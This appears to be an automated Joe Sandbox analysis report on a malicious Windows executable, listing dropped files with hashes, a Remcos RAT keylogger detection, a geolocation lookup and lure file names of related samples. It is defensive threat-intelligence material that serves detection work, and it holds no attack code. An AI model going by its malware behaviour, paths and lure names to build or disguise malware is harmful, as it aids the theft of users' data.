172.93.222.25 | unknown | United States | 23033 | WOWUS | true
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1473335
              Start date and time:2024-07-15 09:21:22 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 15m 40s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
              Run name:Suspected Instruction Hammering
              Number of analysed new started processes analysed:27
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Uundgaaelige.exe
              Detection:MAL
              Classification:mal100.phis.troj.spyw.evad.winEXE@31/29@1/3
              EGA Information:
              • Successful, ratio: 80%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 220
              • Number of non-executed functions: 221
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.42.73.29
              • Excluded domains from analysis (whitelisted): assets.msn.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, api.msn.com
              • Execution Graph export aborted for target powershell.exe, PID 8572 because it is empty
              • Not all processes were analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size exceeded maximum capacity and may have missing network information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              Time | Type | Description
              03:24:29 | API Interceptor | 4338175x Sleep call for process: wab.exe modified
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.0122032384651958
                                                Encrypted:false
                                                SSDEEP:192:8jbAaUTYCQmBUWIjC3o2Z2Du76ffAIO8o:AbABTYCZBUWIjfDu76ffAIO8o
                                                MD5:5E5F88E2C799705CEC695E7F6C4334B3
                                                SHA1:9AC2809F41E84DA9A1DC195B2EC532DEE0503143
                                                SHA-256:39E40D28040B23E1DE6C1C05376E41BA7C384C7EDB553A9A7391A5674C218CFB
                                                SHA-512:6DF7EC2D284B0777B4CC79AC17B4F91B58561FA640390B04CD7F74C8EDF67B54EEA873D1F12BA62ED8359CC67AB3BF25AD50C49D4FEC7553C08F0AF59F81EEA9
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.5.0.1.9.5.1.3.6.6.0.2.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.5.5.0.1.9.5.1.7.7.2.1.8.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.6.5.8.e.8.2.2.-.8.d.e.1.-.4.5.1.a.-.b.b.5.d.-.3.1.e.7.0.b.2.c.5.8.7.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.1.f.8.9.4.a.-.c.0.4.f.-.4.1.3.7.-.a.a.6.e.-.f.7.4.e.f.e.b.f.c.8.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.a.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.2.2.4.-.0.0.0.1.-.0.0.3.2.-.4.d.c.5.-.c.7.e.f.8.7.d.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Mon Jul 15 07:25:51 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):142988
                                                Entropy (8bit):1.8696994812417487
                                                Encrypted:false
                                                SSDEEP:384:lHe5fAvGJCLNkcl53MiHCKvrTMpcKe10LlWl9y5oQCf2rXMs3u1:lHehAvGwLTl59iKjTMGKenbfuy
                                                MD5:54C55A027FA73173279B2966AC959E1D
                                                SHA1:08AB5D6D3B29E55C9EF5E4EF39DA59792D1BE204
                                                SHA-256:071B5B8A081119A03C176B9CB969F0C55054E0F797F63A7E1FCBA2E78D81A7BA
                                                SHA-512:C30189B8FF94A38EDC8FE4F62F2E09A2836B912C3BABE45C11153D38E430B6F1135DC9A15BE3497D13793E84B62628F500AC8D5459F02F07DA9E686DB528C96C
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6310
                                                Entropy (8bit):3.719743755828913
                                                Encrypted:false
                                                SSDEEP:192:R9l7lZNiSrm6GFEYjsECmprRL89bBrBYsfobcrm:R9lnNiSK6GFEYjsEpsBRfobd
                                                MD5:7B4A2C6B50062DB851D39219B3F4F7DB
                                                SHA1:28EB0F9C808FC88E7CE962992F7C6AAB91153AAF
                                                SHA-256:45AEC2198018B22A7A57446C242EB4C66EFF1AFDCB0A43FF3814272D882C1717
                                                SHA-512:E6F09D677C6A633E820792850BA5D493C6879A4D03BBB5BF8D2E6F82B59F46AA288B4EA3AB1ADBE1AB0CF983755455E477024BEB35BC940B1DDB5A97833825AF
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.7.4.0.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4763
                                                Entropy (8bit):4.472361745821808
                                                Encrypted:false
                                                SSDEEP:48:cvIwwtl8zsKe702I7VFJ5Ws2mYrTs3rm8M4JamvPFZB+q8hQLDR7I44d:uILfv7GysbYmJaMBCQ/Rk44d
                                                MD5:E49CFA3592E78E37E0316C612DB440EC
                                                SHA1:8EC457275F08F9F277A6AD19CC5E7511B75C4A3A
                                                SHA-256:32F97EAD96228165B22DBF6909AE065307C8F6B01EEDE6185C8E46DD3E13B1C8
                                                SHA-512:189B19A50ED018A73102A2017073DA48500BAB39D2D3F6A887E213572B64694E5EA473C1492822BDA1DA6C54C90E01BEB00DD4B3266900933225DEAFE0FFDD00
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222755648" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144
                                                Entropy (8bit):3.38816599775145
                                                Encrypted:false
                                                SSDEEP:3:rhlKlVRFNPU5JWRal2Jl+7R0DAlBG45klovDl6v:6lVRU5YcIeeDAlOWAv
                                                MD5:E9C0FF3D3CD817293D4152ACA59CBA43
                                                SHA1:CCD89BCEEC47710CEA252201F71A5190ED1D1623
                                                SHA-256:35E9073E9931B4D040D9DC324B7F16220D6B3E8B0AB0B6187ECD36B82E86D7E0
                                                SHA-512:21A15C2B65983680C9CF9A097FD77047477A05B1DC2CCA8C0E19803D150091C94D438ED0A1E99B133E9E7C5884C64018EE996DFA6C8C80974E7898F985C80699
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                Preview:....[.2.0.2.4./.0.7./.1.5. .0.3.:.2.3.:.5.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):974
                                                Entropy (8bit):4.981925787151735
                                                Encrypted:false
                                                SSDEEP:12:tklund6UGkMyGWKyGXPVGArwY34MaUHZGgArpv/mOAaNO+ao9W7iN5zzkw7Rp9Jk:qlidVauKyGX85pvXhNlT3/7p0hdsro
                                                MD5:B5F03A2120A9F1946A9D9CD0D869B6E9
                                                SHA1:CAF50A7CFF92657C8C86A8992342AC4823CE1BF2
                                                SHA-256:A6F856D1EDD8D5F04BB3D12C3B9DCB3329606A93BB3A69C1715D648DE161B741
                                                SHA-512:A528724691AFA49EBEEF96EAC49450FE61FAABFA4B4A78F5208D816B2E47ED2C8343E15316CED3363DF4DF64E85174231A674D0F6C0866604004CA249A6478D4
                                                Malicious:false
                                                Preview:{. "geoplugin_request":"81.181.54.64",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Los Angeles",. "geoplugin_region":"California",. "geoplugin_regionCode":"CA",. "geoplugin_regionName":"California",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"803",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0544",. "geoplugin_longitude":"-118.2441",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):8003
                                                Entropy (8bit):4.840877972214509
                                                Encrypted:false
                                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                MD5:106D01F562D751E62B702803895E93E0
                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                Malicious:false
                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33f90050, page size 32768, DirtyShutdown, Windows version 10.0
                                                Category:dropped
                                                Size (bytes):14680064
                                                Entropy (8bit):0.12080190500521996
                                                Encrypted:false
                                                SSDEEP:1536:HSB2wWSB2wJSjlK/5luiJgv239rKPR39rgaX39r63Jga73wthKXqPXK539rQOthL:HaQaLZN3BY3Bj3BSS+X3B9+g
                                                MD5:01B9328D272205AAF2B194EAA5F7B3AE
                                                SHA1:3C87ACECC403FD67A6D18B2E31666A0F042623B4
                                                SHA-256:22560DBA159875F291E6BB20B581D331DEB62137F5658A69FA6745BF4D9C92D2
                                                SHA-512:186E482B24E1B612545DD7BB59C12C00C40B806D5A4B118AC8416FF97E063D9E50252E573BB6B36DD4EA5EDD658F4B25F64FA2D8805752A8D0B328D394AC2FC4
                                                Malicious:false
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):7680
                                                Entropy (8bit):5.1850294262777945
                                                Encrypted:false
                                                SSDEEP:96:8eD0AKTIfv7QCUsthvNL85s4lk38Eb3CDfvEh8uLzqkznLiEQjJ3KxkP:tZBfjbUA/85q3wEh8uLmaLpmP
                                                MD5:24DB082241ACE4ACA15BDF1E8460C92B
                                                SHA1:D317EF130AF6EA6A72A958EEE20A58568D38F23D
                                                SHA-256:D0607E535FF5573638EE1D70612E2239D5CB3C87307F48CFD57AA1C5CC0D9524
                                                SHA-512:EC1DCF17E2E72DBDF06D91250F0698CD50144836A1EE4A3E8A50605E27F8106DB595C61A81349A72CE652BC03AEE0033FED1700D87D8F2D0E4CD1DB9515E7EE2
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: r14836901-5B4A-.exe, Detection: malicious
                                                • Filename: Bootblacks.exe, Detection: malicious
                                                • Filename: Halkbank_Ekstre_06535798_98742134.pdf.exe, Detection: malicious
                                                • Filename: Halkbank_Ekstre_87762122_97575533.pdf.exe, Detection: malicious
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):4096
                                                Entropy (8bit):3.286196206952677
                                                Encrypted:false
                                                SSDEEP:48:qKZ4n2rZ4vuXXqQr1wH+zL/o0o/X/3MVyjlZSDP15gaoFU:5O4ZxKQruHkJwvcVyoP4FU
                                                MD5:C051C86F6FA84AC87EFB0CF3961950A1
                                                SHA1:F18F4BB803099B80A3A013ECB03FEA11CFF0AC01
                                                SHA-256:D0949B4C0640EE6A80DB5A7F6D93FC631ED194DE197D79BF080EC1752C6F1166
                                                SHA-512:6E9DE5D07AAED2AC297FAA5049D567884D817ED94DECE055D96913AC8E497ADE6F0FF5C28BAE7CC7D3AC41F8795EFB9939E6D12061A3C446D5D2A3E2287D49D2
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: DriverUpdate.exe, Detection: malicious
                                                • Filename: DSOneApp(1).exe, Detection: malicious
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):9728
                                                Entropy (8bit):5.067208332431121
                                                Encrypted:false
                                                SSDEEP:96:oCqZ4zC5RH3cXX1LlYlRowycxM2DjDf3GEst+Nt+jvDYx4iqndYHnxss:oCq+CP3uKrpyREs06Yx+dGn
                                                MD5:EE449B0ADCE56FBFA433B0239F3F81BE
                                                SHA1:EC1E4F9815EA592A3F19B1FE473329B8DDFA201C
                                                SHA-256:C1CC3AA4326E83A73A778DEE0CF9AFCC03A6BAFB0A32CEA791A27EB9C2288985
                                                SHA-512:22FB25BC7628946213E6E970A865D3FBD50D12CE559C37D6848A82C28FA6BE09FEDFFC3B87D5AEA8DCFE8DFC4E0F129D9F02E32DAE764B8E6A08332B42386686
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com, Detection: malicious
                                                • Filename: RFQ#ORDER-PRODUCTION-24-091-06 -SUPPLY.com.exe, Detection: malicious
                                                • Filename: VSL'S PARTICULARS FOR TRUE-COMPASS V2406.docx.com.exe, Detection: malicious
                                                • Filename: RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com.exe, Detection: malicious
                                                • Filename: ______-POORD210865679-09XY-21-Order.com.exe, Detection: malicious
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):477672
                                                Entropy (8bit):7.3830024168217925
                                                Encrypted:false
                                                SSDEEP:12288:d9YICgHLJOdXHEWyT2722TCM9nOG/cO55:fYIBJOdS72TCMTkO
                                                MD5:0AAE89D83E2E237DA1DA848AB00EDB56
                                                SHA1:A7200FC7C366ADAB3AC36E86749ACE7972ED9868
                                                SHA-256:D2876C6FB404B9DA41446308B3A58F535514FBD8301039906DF5C1BBEAA41AC8
                                                SHA-512:F369D5D1D8981B59E48313A2E8E75FC6BCF32D4D9DEC65B9FDE723CD45FE27E004A2A6609C5FE5FCAED76289B45275EFFE3F3211AB3E2DF2FC249AC9925CC6EA
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):71748
                                                Entropy (8bit):5.220315698035117
                                                Encrypted:false
                                                SSDEEP:1536:DDwlPzV4Fn5Wm1flOf6YwkXjvVw92tCsyBjIHOJwvzQCmU65:38yF5Wu9hxkXjvVc2TitmvzQZU65
                                                MD5:A2D89F4D3B619450083C55932293F2CF
                                                SHA1:F4975DD0B85438166922A4130DBBE8A058FC009A
                                                SHA-256:008302E66DF0902BDD917AAC31979F6A3B248189FADD2CE84C42E3E6618DC8C3
                                                SHA-512:5A4D8DA3322D2734DC277A5168DB4A00FB8EE5DC1B19BABA5357AD4BAF39BEFA78AB090DFBDD1688635B3E91140DE2BC7F65DE7754A7B19F7CDAEB9F4AE73CD7
                                                Malicious:true
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):344543
                                                Entropy (8bit):7.630340676453064
                                                Encrypted:false
                                                SSDEEP:6144:RX2X1mbYg3cXeryZWBoFK88LI4dKKOaEXHp7CWs2wx/sJ6Fh2722OKCqe:R9YICgHLJOdXHEWyT2722TC5
                                                MD5:2D9012D9A7BE9298B64873CE23AFCB6B
                                                SHA1:26111932D7A89DD087C1CD2CD1812AD9068A3EE3
                                                SHA-256:C481F233E1E2FA5322C3444B51810742BD1E9D1A6A549BAA7B2A21378844D93D
                                                SHA-512:CEBEA6DE861B46F561F212423B81BF652CCB5BC57BDD960A449F0F89CD8D5A55B7B711A596972F2E4E86232C568E4DB3B3FB032184144B7FABCB1F4F17D92D0E
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):7661
                                                Entropy (8bit):4.873450928679742
                                                Encrypted:false
                                                SSDEEP:192:oBexGw4CNUs99q5UrUrcnEYWi2qwhXwKCk6:EexGw4C+s9l5I4Km
                                                MD5:4C32AE5B5D401F961380D7DAF3AFC365
                                                SHA1:0084D96D3E973D9E0A8054EF6098BE3F36C9816D
                                                SHA-256:98CC30B99717B7753F039609A9EF76553A9C2B0DFDADBCDF962FC95384173792
                                                SHA-512:27E629328C359B48D56033DE2C3811FB44C2F15EBC43108CC5BB8F69E9130006C4745C312CC4922514318F3C9E93964E4F8C58C7F4A78FF0796579817CE7D1C6
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):554400
                                                Entropy (8bit):7.1313111477846975
                                                Encrypted:false
                                                SSDEEP:12288:WDkS/CNT9fM913qbLd+cUQj5X7JPKmdE9s4Jr:WDEc9tqb5akVPHE93N
                                                MD5:FC55407CC82612103C5971DCA1837D6B
                                                SHA1:01EFA90009900C64C846B7AC716DEA3C5F97C4E8
                                                SHA-256:C9736CDC4ADE9FDDB9B293E0366F182F972154D98169B58E532B7905C310BF97
                                                SHA-512:08EDFA8F06459AE170EA444664776E57836BD6142721D8DF663776051C8C6DAB98F7C8902848ED08E4311A858D95EB38D0DF13208F8E0144A2FA9FA1A90C0240
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                • Antivirus: Virustotal, Detection: 14%
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8136
                                                Entropy (8bit):4.8744228802078355
                                                Encrypted:false
                                                SSDEEP:192:umvO2UHW0DkAQ1mAerW1e63184s7+jkHYQBALB6klVxzf:uv26lzwQi1e4Ps7+w47L3hf
                                                MD5:3DECB5BC070963391ED24136D9D39633
                                                SHA1:CBA6B9B3C6421B020649FB07A418297D1BDA4F45
                                                SHA-256:91AA495BF1782F68AC5E779FDCBBA1B8CF131954F9C42176566472B597387BA0
                                                SHA-512:FF96EB145436C8814FACC71DDB5000E293B0610A9DD13A00E71D5BE5FFF57204DBBC0B6B8D3855A525FEACDF0631843010C45BABD4EF6F54C5AA54B13EC22949
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5999
                                                Entropy (8bit):4.930999496749815
                                                Encrypted:false
                                                SSDEEP:96:NCsEB8dygfnrmDE82LCeSSYFGqAn1OaG1IsoJ9M30GKMRwf4Xs4QR:UsExCnqSLg9+GIsQm30aRy4MR
                                                MD5:18818318A7091F31A6673C1E6691893E
                                                SHA1:1BCB5CA319505BDC0466DDB93877A4A1E1A51F11
                                                SHA-256:315B816906EE577BA1BED2A2922C43BB1784CABFD8248EE5A5964F3B09BB41A9
                                                SHA-512:256F17D954CF295CA4D8025AC609D84E0010E11C81BA9184B0639BD866680D60DF3EB5C69DE81B539D735936BC5382F247236D488745BECAE731D491A6E5C1F5
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6134
                                                Entropy (8bit):4.885622669075655
                                                Encrypted:false
                                                SSDEEP:96:spFjZT61CS2EXhewGtdqTxOQ2GCxIJE/5jTVZomc91+Ra4O0tBVceGCUY6a:sjZgCghewGLqTxR2GCmG/XoL9vbCDH
                                                MD5:20CC3561DEE93C050A00596D8B8EE12F
                                                SHA1:055769FED332180B097366E5D8E54A4D4B941BE2
                                                SHA-256:4B1A99DD41C0242616390C0AA7C8C2AE08C1B306D794DE3188DFD0B49B1D6775
                                                SHA-512:2DABB57E35F00D25BA834D52AEF454185B4CB2E38F774096EA7D771D4374022E887E092D647AF8F898BB7F6B0BFEF5FDBBEE1F70BC9DC8A08AD6D9DC87B81CDF
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\Uundgaaelige.exe
                                                File Type:TTComp archive data, binary, 2K dictionary
                                                Category:dropped
                                                Size (bytes):4113
                                                Entropy (8bit):4.8553310540222885
